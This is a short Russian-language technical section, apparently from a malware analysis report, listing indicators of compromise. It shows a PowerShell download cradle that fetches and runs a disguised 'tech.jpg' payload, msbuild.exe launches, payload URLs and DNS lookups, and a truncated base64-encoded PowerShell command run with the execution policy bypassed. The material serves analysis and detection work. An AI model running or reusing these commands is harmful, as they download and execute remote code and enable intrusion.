Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://of######ervice-softs.info/tech.jpg')
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- http://of######ervice-softs.info/tech.jpg
- http://of######ervice-softs.info/rnp.txt
- DNS ASK of######ervice-softs.info
- DNS ASK kr######turbo.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://of######ervice-softs.info/tech.jpg')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JABYAHcAIAA9ACAAJwBNAHUAZwBwAGoAcwBjAFcAQgAnADsACgAkAFAAcwBiAGIAWQBWAGwAYgBrACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcAL...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'